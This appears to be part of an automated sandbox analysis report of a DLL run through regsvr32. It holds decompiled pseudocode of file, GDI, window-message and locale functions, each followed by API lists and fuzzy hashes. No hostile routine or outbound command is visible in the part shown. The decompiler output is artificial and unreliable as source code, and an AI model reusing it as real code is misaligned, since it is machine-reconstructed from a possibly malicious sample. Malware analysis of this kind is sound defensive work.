                                                                                                                							 *0x1006eff8( *_t34 - (_t130 + 3) * _t60 + (_t117 + 1) *  *0x1006c2bc * _t106 +  *0x1006c2c8 + _t133 * 2 + (_t130 + 3) * _t60 + (_t117 + 1) *  *0x1006c2bc * _t106 +  *0x1006c2c8 + _t133 * 2 + (_t130 + 3) * _t60 + (_t117 + 1) *  *0x1006c2bc * _t106 +  *0x1006c2c8 + _t133 * 2 + (_t130 + 3) * _t60 + (_t117 + 1) *  *0x1006c2bc * _t106 +  *0x1006c2c8 + _t133 * 2);
                                                                                                                							_t160 = _t160 + 4;
                                                                                                                							goto L10;
                                                                                                                						}
                                                                                                                						do {
                                                                                                                							_t62 =  *0x1006c2c8; // 0x0
                                                                                                                							_t144 =  *0x1006c2bc; // 0x0
                                                                                                                							_t21 = _t137 + 8; // 0x44c4835b
                                                                                                                							if( *((intOrPtr*)( *_t21 + (_t144 - _t62 * _t106 - _t117 + _t93) * 4)) != 0) {
                                                                                                                								_t24 = _t137 + 0x34; // 0x400d89c7
                                                                                                                								_t74 =  *0x1006c2c8; // 0x0
                                                                                                                								_t27 = _t137 + 8; // 0x44c4835b
                                                                                                                								_t30 = _t137 + 0x2c; // 0x3ca2b80
                                                                                                                								 *((intOrPtr*)( *_t30))( *((intOrPtr*)( *_t27 + (_t93 + (((_t74 + 2) * _t117 + 3) * _t106 + (_t117 * _t117 - _t130 *  *0x1006c2bc - _t130) *  *0x1006c2d0 + _t130) * 4 + ((_t74 + 2) * _t117 + 3) * _t106 + (_t117 * _t117 - _t130 *  *0x1006c2bc - _t130) *  *0x1006c2d0 + _t130) * 4)),  *_t24);
                                                                                                                								_t106 =  *0x1006c2c0; // 0x0
                                                                                                                								_t117 =  *0x1006c2cc; // 0x0
                                                                                                                								_t130 =  *0x1006c2c4; // 0x0
                                                                                                                								_t160 = _t160 + 8;
                                                                                                                							}
                                                                                                                							_t60 =  *0x1006c2d0; // 0x0
                                                                                                                							_t33 = _t137 + 0xc; // 0x8b078bc3
                                                                                                                							_t93 = _t93 + 1;
                                                                                                                						} while (_t93 < _t117 - (_t130 * _t130 *  *0x1006c2c8 * _t106 + _t106 + 2) * _t106 - _t60 +  *_t33);
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t44;
                                                                                                                			}

























                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: b08c8ccb2079808c9cd3088015a788ca90edb0835c532b8cd28d86616119427e
                                                                                                                • Instruction ID: e5945d3396b55d96ce05bd6873ecdba237432edcb74fc20a22c2999447666e4a
                                                                                                                • Opcode Fuzzy Hash: b08c8ccb2079808c9cd3088015a788ca90edb0835c532b8cd28d86616119427e
                                                                                                                • Instruction Fuzzy Hash: BE51643260021B8FE358EFA8CDD5E6977A6FB84304F05812AD945CB6B5E6B0F551CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10034D23(void* __ecx, void* __eflags, signed int* _a4) {
                                                                                                                				char _v12;
                                                                                                                				struct _FILETIME _v20;
                                                                                                                				struct _FILETIME _v28;
                                                                                                                				char _v36;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t52;
                                                                                                                				long _t56;
                                                                                                                				signed int* _t75;
                                                                                                                				signed int* _t78;
                                                                                                                				signed int* _t81;
                                                                                                                				struct _FILETIME* _t88;
                                                                                                                				void* _t100;
                                                                                                                				CHAR* _t101;
                                                                                                                				signed int* _t102;
                                                                                                                				void* _t103;
                                                                                                                				void* _t107;
                                                                                                                
                                                                                                                				_t102 = _a4;
                                                                                                                				_t100 = __ecx;
                                                                                                                				E1003BB70(__ecx, _t102, 0, 0x128);
                                                                                                                				E10017042(0, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
                                                                                                                				_t52 =  *(_t100 + 4);
                                                                                                                				_t107 = _t52 -  *0x1005af9c; // 0xffffffff
                                                                                                                				if(_t107 == 0) {
                                                                                                                					L21:
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                				_t88 =  &_v12;
                                                                                                                				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
                                                                                                                					_t56 = GetFileSize( *(_t100 + 4), 0);
                                                                                                                					_t102[6] = _t56;
                                                                                                                					_t102[7] = 0;
                                                                                                                					if(_t56 != 0xffffffff || 0 != 0) {
                                                                                                                						_t101 =  *(_t100 + 0xc);
                                                                                                                						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
                                                                                                                							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
                                                                                                                						} else {
                                                                                                                							_t102[8] = 0;
                                                                                                                						}
                                                                                                                						if(E1002A695( &_v12) == 0) {
                                                                                                                							 *_t102 = 0;
                                                                                                                							_t102[1] = 0;
                                                                                                                						} else {
                                                                                                                							_t81 = E1002A7AF( &_v36,  &_v12, 0xffffffff);
                                                                                                                							 *_t102 =  *_t81;
                                                                                                                							_t102[1] = _t81[1];
                                                                                                                						}
                                                                                                                						if(E1002A695( &_v20) == 0) {
                                                                                                                							_t102[4] = 0;
                                                                                                                							_t102[5] = 0;
                                                                                                                						} else {
                                                                                                                							_t78 = E1002A7AF( &_v36,  &_v20, 0xffffffff);
                                                                                                                							_t102[4] =  *_t78;
                                                                                                                							_t102[5] = _t78[1];
                                                                                                                						}
                                                                                                                						if(E1002A695( &_v28) == 0) {
                                                                                                                							_t102[2] = 0;
                                                                                                                							_t102[3] = 0;
                                                                                                                						} else {
                                                                                                                							_t75 = E1002A7AF( &_v36,  &_v28, 0xffffffff);
                                                                                                                							_t102[2] =  *_t75;
                                                                                                                							_t102[3] = _t75[1];
                                                                                                                						}
                                                                                                                						if(( *_t102 | _t102[1]) == 0) {
                                                                                                                							 *_t102 = _t102[2];
                                                                                                                							_t102[1] = _t102[3];
                                                                                                                						}
                                                                                                                						if((_t102[4] | _t102[5]) == 0) {
                                                                                                                							_t102[4] = _t102[2];
                                                                                                                							_t102[5] = _t102[3];
                                                                                                                						}
                                                                                                                						goto L21;
                                                                                                                					} else {
                                                                                                                						goto L2;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L2:
                                                                                                                				return 0;
                                                                                                                			}























                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 10034D3A
                                                                                                                  • Part of subcall function 10017042: _wctomb_s.LIBCMT ref: 10017052
                                                                                                                • GetFileTime.KERNEL32(?,?,?,?), ref: 10034D71
                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 10034D86
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 26245289-0
                                                                                                                • Opcode ID: 1c3635f1f843798793357e0fd1e265308dbc9aa43cabc2304d30c89dc91eda71
                                                                                                                • Instruction ID: 29182117bb34cabb22a9083561f3b77f2cd62cc52f0fc2d74ac8d73a98a901d8
                                                                                                                • Opcode Fuzzy Hash: 1c3635f1f843798793357e0fd1e265308dbc9aa43cabc2304d30c89dc91eda71
                                                                                                                • Instruction Fuzzy Hash: 63413E79500705AFC725DF68C88189BBBF8FF09351B118A2EE5A6DB690EB30F944CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 73%
                                                                                                                			E10004C70(void* __ecx, void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t45;
                                                                                                                				struct HDC__* _t55;
                                                                                                                				intOrPtr _t64;
                                                                                                                				intOrPtr* _t73;
                                                                                                                				void* _t76;
                                                                                                                				signed int _t102;
                                                                                                                				void* _t106;
                                                                                                                				int _t107;
                                                                                                                				void* _t111;
                                                                                                                				intOrPtr* _t112;
                                                                                                                				intOrPtr _t116;
                                                                                                                				void* _t118;
                                                                                                                				signed int _t119;
                                                                                                                
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10051098);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t119 = _t118 - 0x30;
                                                                                                                				_push(_t111);
                                                                                                                				_push(_t106);
                                                                                                                				_t45 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t45 ^ _t119);
                                                                                                                				 *[fs:0x0] = _t119 + 0x44;
                                                                                                                				_t76 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t119 + 0x4c)) = 0;
                                                                                                                				 *(_t119 + 0x18) = 0;
                                                                                                                				 *((intOrPtr*)(_t119 + 0x14)) = 0x100572e4;
                                                                                                                				 *((char*)(_t119 + 0x4c)) = 1;
                                                                                                                				E100247F5(_t119 + 0x18, _t106, 0, LoadBitmapA( *(E10023187(__ecx, _t106, _t111, __eflags) + 0xc), 0xa9));
                                                                                                                				GetObjectA( *(_t119 + 0x18), 0x18, _t119 + 0x2c);
                                                                                                                				E10023F76(_t119 + 0x1c);
                                                                                                                				_t112 =  *((intOrPtr*)(_t119 + 0x54));
                                                                                                                				 *((char*)(_t119 + 0x4c)) = 2;
                                                                                                                				if(_t112 != 0) {
                                                                                                                					_t55 =  *(_t112 + 4);
                                                                                                                				} else {
                                                                                                                					_t55 = 0;
                                                                                                                				}
                                                                                                                				E1002452E(_t119 + 0x20, _t106, 0, CreateCompatibleDC(_t55));
                                                                                                                				E1002487A( *(_t119 + 0x20),  *(_t119 + 0x18));
                                                                                                                				_t107 =  *(_t119 + 0x64);
                                                                                                                				StretchBlt( *(_t112 + 4), 0, 0, 0x18, _t107,  *(_t119 + 0x20), 0, 0,  *(_t119 + 0x30),  *(_t119 + 0x34), 0xcc0020);
                                                                                                                				E10024848(_t119 + 0x14);
                                                                                                                				_t64 =  *( *( *_t112 + 0x28))(_t76 + 0x104);
                                                                                                                				_t116 =  *((intOrPtr*)(_t119 + 0x68));
                                                                                                                				 *((intOrPtr*)(_t119 + 0x58)) = _t64;
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x5c))))( *((intOrPtr*)(_t119 + 0x5c)) + 5, _t107 -  *((intOrPtr*)(_t119 + 0x5c)) + 0x41, _t116,  *((intOrPtr*)(_t116 - 0xc)));
                                                                                                                				_t102 =  *( *_t112 + 0x28);
                                                                                                                				 *_t102( *((intOrPtr*)(_t119 + 0x54)));
                                                                                                                				 *((intOrPtr*)(_t76 + 0x100)) = 0;
                                                                                                                				 *((char*)(_t119 + 0x4c)) = 1;
                                                                                                                				E100245A8(_t119 + 0x1c);
                                                                                                                				 *((char*)(_t119 + 0x4c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t119 + 0x14)) = 0x100572c4;
                                                                                                                				E10024848(_t119 + 0x14);
                                                                                                                				_t73 = _t116 - 0x10;
                                                                                                                				 *((intOrPtr*)(_t119 + 0x4c)) = 0xffffffff;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				if((_t102 | 0xffffffff) - 1 <= 0) {
                                                                                                                					_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t73)) + 4))))(_t73);
                                                                                                                				}
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t119 + 0x44));
                                                                                                                				return _t73;
                                                                                                                			}





















                                                                                                                APIs
                                                                                                                • LoadBitmapA.USER32 ref: 10004CBE
                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 10004CDA
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 10004CFE
                                                                                                                • StretchBlt.GDI32(?,00000000,00000000,00000018,?,?,00000000,00000000,?,?,00CC0020), ref: 10004D40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BitmapCompatibleCreateLoadObjectStretch
                                                                                                                • String ID:
                                                                                                                • API String ID: 1313918214-0
                                                                                                                • Opcode ID: 90a382312d36e1a782ccbb2849c981e49af76e3876e9b04abb96af5c556acf95
                                                                                                                • Instruction ID: 981638c05eaeedc65a42f4fecd3c7dad98e086370d3711bde41bb7d3d10c01a7
                                                                                                                • Opcode Fuzzy Hash: 90a382312d36e1a782ccbb2849c981e49af76e3876e9b04abb96af5c556acf95
                                                                                                                • Instruction Fuzzy Hash: 764169B5208345AFD310CF58C884E5BBBF9FB99710F018A1DF59587291DB35E909CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 78%
                                                                                                                			E10039B0A(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				struct tagRECT _v40;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed short _t60;
                                                                                                                				signed short _t65;
                                                                                                                				intOrPtr _t67;
                                                                                                                				signed int _t73;
                                                                                                                				void* _t76;
                                                                                                                				void* _t80;
                                                                                                                				void* _t84;
                                                                                                                				intOrPtr _t85;
                                                                                                                
                                                                                                                				_t76 = __ecx;
                                                                                                                				_v24 = 1;
                                                                                                                				_v20 = 1;
                                                                                                                				_push(GetStockObject(0));
                                                                                                                				_t85 = E100247E7(__ecx, __ecx, _t80, _t84, __eflags);
                                                                                                                				_v16 = _t85;
                                                                                                                				_v8 = E10024C61(_t76, _t80, _t85, __eflags);
                                                                                                                				_t60 =  *(_t76 + 0x74);
                                                                                                                				_v12 = _t85;
                                                                                                                				if((0x0000a000 & _t60) == 0) {
                                                                                                                					__eflags = _t60 & 0x00005000;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_v24 = GetSystemMetrics(0x20) - 1;
                                                                                                                						_v20 = GetSystemMetrics(0x21) - 1;
                                                                                                                						_t65 =  *(_t76 + 0x78);
                                                                                                                						__eflags = 0x0000a000 & _t65;
                                                                                                                						if((0x0000a000 & _t65) == 0) {
                                                                                                                							L6:
                                                                                                                							__eflags = _t65 & 0x00005000;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								L9:
                                                                                                                							} else {
                                                                                                                								__eflags =  *(_t76 + 0x7c);
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L9;
                                                                                                                								} else {
                                                                                                                									goto L8;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							__eflags =  *(_t76 + 0x7c);
                                                                                                                							if(__eflags != 0) {
                                                                                                                								goto L6;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_v12 = _v8;
                                                                                                                					} else {
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                				}
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				if(_a4 != 0) {
                                                                                                                					_v20 = 0;
                                                                                                                					_v24 = 0;
                                                                                                                				}
                                                                                                                				if(( *(_t76 + 0x74) & 0x0000f000) != 0) {
                                                                                                                					InflateRect( &_v40, 0xffffffff, 0xffffffff);
                                                                                                                				}
                                                                                                                				_t97 =  *(_t76 + 0x24);
                                                                                                                				_t67 = _v8;
                                                                                                                				if( *(_t76 + 0x24) == 0) {
                                                                                                                					_t67 = _v16;
                                                                                                                				}
                                                                                                                				E10024D04(_t76,  *((intOrPtr*)(_t76 + 0x84)), _t76 + 0xc, 0, _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
                                                                                                                				asm("movsd");
                                                                                                                				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
                                                                                                                				asm("movsd");
                                                                                                                				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
                                                                                                                				asm("movsd");
                                                                                                                				_t73 = 0 | _v12 == _v8;
                                                                                                                				asm("movsd");
                                                                                                                				 *(_t76 + 0x24) = _t73;
                                                                                                                				return _t73;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • GetStockObject.GDI32(00000000), ref: 10039B20
                                                                                                                  • Part of subcall function 10024C61: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 10024CA7
                                                                                                                  • Part of subcall function 10024C61: CreatePatternBrush.GDI32(00000000), ref: 10024CB4
                                                                                                                  • Part of subcall function 10024C61: DeleteObject.GDI32(00000000), ref: 10024CC0
                                                                                                                • InflateRect.USER32 ref: 10039BB9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3923860780-0
                                                                                                                • Opcode ID: b234f663d67296b1003cf7fbfcae3b0a85e960eb97e1173000168dbcbf509421
                                                                                                                • Instruction ID: 6df2a3144f549944751206a5f7481f85cb7bf6598b357e5fb5926b41f58c0568
                                                                                                                • Opcode Fuzzy Hash: b234f663d67296b1003cf7fbfcae3b0a85e960eb97e1173000168dbcbf509421
                                                                                                                • Instruction Fuzzy Hash: 43412771D00219DFDF42CFA8DA80A9EB7F5EF48351F1146A6ED10AB285D771AE41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E1001D72E(void* __ecx, struct HWND__** _a4) {
                                                                                                                				struct HWND__** _v8;
                                                                                                                				struct HWND__** _v12;
                                                                                                                				long _t31;
                                                                                                                				struct HWND__** _t32;
                                                                                                                				struct HWND__** _t44;
                                                                                                                				struct HWND__** _t45;
                                                                                                                				long _t47;
                                                                                                                				void* _t49;
                                                                                                                				struct HWND__** _t63;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t49 = __ecx;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
                                                                                                                					_t31 = _a4;
                                                                                                                					if(_t31 != 0) {
                                                                                                                						if( *((intOrPtr*)(_t31 + 8)) == 0) {
                                                                                                                							L4:
                                                                                                                							_t32 = E1002E183( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
                                                                                                                							_v12 = _t32;
                                                                                                                							_a4 = _t32;
                                                                                                                							E100182A6( &_a4);
                                                                                                                							while(_a4 != 0) {
                                                                                                                								_t37 =  *((intOrPtr*)(E100182A6( &_a4)));
                                                                                                                								_v8 =  *((intOrPtr*)(E100182A6( &_a4)));
                                                                                                                								if((E1001D44A(_t37) & 0x00020000) != 0) {
                                                                                                                									break;
                                                                                                                								} else {
                                                                                                                									_t45 = _v8;
                                                                                                                									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                										L16:
                                                                                                                										_t44 = _v8;
                                                                                                                										goto L17;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								goto L18;
                                                                                                                							}
                                                                                                                							_a4 = _v12;
                                                                                                                							_t31 = E1001D535( &_a4);
                                                                                                                							while(_a4 != 0) {
                                                                                                                								_t63 =  *(E1001D535( &_a4));
                                                                                                                								_v8 = _t63;
                                                                                                                								if(_t63[2] == 0) {
                                                                                                                									L13:
                                                                                                                									_t31 = E1001D44A(_t63);
                                                                                                                									if((_t31 & 0x00020000) == 0) {
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
                                                                                                                										goto L16;
                                                                                                                									} else {
                                                                                                                										_t63 = _v8;
                                                                                                                										goto L13;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								goto L18;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
                                                                                                                							_t44 = _a4;
                                                                                                                							if(_t47 == 1) {
                                                                                                                								L17:
                                                                                                                								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
                                                                                                                							} else {
                                                                                                                								goto L4;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L18:
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t31;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 0b67bc060d87b7afd963845cf947f9e7fbc9eb519e38dc72100a594d7b494ab9
                                                                                                                • Instruction ID: bce9a119d42f123f64b4935fa0f80d8b17d978cfcd7e48ab87300b2a9d621cc8
                                                                                                                • Opcode Fuzzy Hash: 0b67bc060d87b7afd963845cf947f9e7fbc9eb519e38dc72100a594d7b494ab9
                                                                                                                • Instruction Fuzzy Hash: 74314974940119BBDB25FF51C891EAA3BA9EF417D4F10806BF9059F251DA30EDC0DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004D43C(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				char _v8;
                                                                                                                				signed int _v12;
                                                                                                                				char _v20;
                                                                                                                				char _t43;
                                                                                                                				char _t46;
                                                                                                                				signed int _t53;
                                                                                                                				signed int _t54;
                                                                                                                				intOrPtr _t56;
                                                                                                                				intOrPtr _t57;
                                                                                                                				int _t58;
                                                                                                                				signed short* _t59;
                                                                                                                				short* _t60;
                                                                                                                				int _t65;
                                                                                                                				char* _t72;
                                                                                                                
                                                                                                                				_t72 = _a8;
                                                                                                                				if(_t72 == 0 || _a12 == 0) {
                                                                                                                					L5:
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					if( *_t72 != 0) {
                                                                                                                						E1003B686( &_v20, __edi, _a16);
                                                                                                                						_t43 = _v20;
                                                                                                                						__eflags =  *(_t43 + 0x14);
                                                                                                                						if( *(_t43 + 0x14) != 0) {
                                                                                                                							_t46 = E1004C8A8( *_t72 & 0x000000ff,  &_v20);
                                                                                                                							__eflags = _t46;
                                                                                                                							if(_t46 == 0) {
                                                                                                                								__eflags = _a4;
                                                                                                                								_t40 = _v20 + 4; // 0x840ffff8
                                                                                                                								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                								if(__eflags != 0) {
                                                                                                                									L10:
                                                                                                                									__eflags = _v8;
                                                                                                                									if(_v8 != 0) {
                                                                                                                										_t53 = _v12;
                                                                                                                										_t11 = _t53 + 0x70;
                                                                                                                										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                										__eflags =  *_t11;
                                                                                                                									}
                                                                                                                									return 1;
                                                                                                                								}
                                                                                                                								L21:
                                                                                                                								_t54 = E1003D47E(__eflags);
                                                                                                                								 *_t54 = 0x2a;
                                                                                                                								__eflags = _v8;
                                                                                                                								if(_v8 != 0) {
                                                                                                                									_t54 = _v12;
                                                                                                                									_t33 = _t54 + 0x70;
                                                                                                                									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                									__eflags =  *_t33;
                                                                                                                								}
                                                                                                                								return _t54 | 0xffffffff;
                                                                                                                							}
                                                                                                                							_t56 = _v20;
                                                                                                                							_t15 = _t56 + 0xac; // 0xa045ff98
                                                                                                                							_t65 =  *_t15;
                                                                                                                							__eflags = _t65 - 1;
                                                                                                                							if(_t65 <= 1) {
                                                                                                                								L17:
                                                                                                                								_t24 = _t56 + 0xac; // 0xa045ff98
                                                                                                                								__eflags = _a12 -  *_t24;
                                                                                                                								if(__eflags < 0) {
                                                                                                                									goto L21;
                                                                                                                								}
                                                                                                                								__eflags = _t72[1];
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L21;
                                                                                                                								}
                                                                                                                								L19:
                                                                                                                								__eflags = _v8;
                                                                                                                								_t27 = _t56 + 0xac; // 0xa045ff98
                                                                                                                								_t57 =  *_t27;
                                                                                                                								if(_v8 == 0) {
                                                                                                                									return _t57;
                                                                                                                								}
                                                                                                                								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                								return _t57;
                                                                                                                							}
                                                                                                                							__eflags = _a12 - _t65;
                                                                                                                							if(_a12 < _t65) {
                                                                                                                								goto L17;
                                                                                                                							}
                                                                                                                							__eflags = _a4;
                                                                                                                							_t21 = _t56 + 4; // 0x840ffff8
                                                                                                                							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                							__eflags = _t58;
                                                                                                                							_t56 = _v20;
                                                                                                                							if(_t58 != 0) {
                                                                                                                								goto L19;
                                                                                                                							}
                                                                                                                							goto L17;
                                                                                                                						}
                                                                                                                						_t59 = _a4;
                                                                                                                						__eflags = _t59;
                                                                                                                						if(_t59 != 0) {
                                                                                                                							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					} else {
                                                                                                                						_t60 = _a4;
                                                                                                                						if(_t60 != 0) {
                                                                                                                							 *_t60 = 0;
                                                                                                                						}
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1004D46C
                                                                                                                • __isleadbyte_l.LIBCMT ref: 1004D4A0
                                                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000001,?,00000001,1004AD5F,?,?,00000002), ref: 1004D4D1
                                                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000001,?,00000001,1004AD5F,?,?,00000002), ref: 1004D53F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
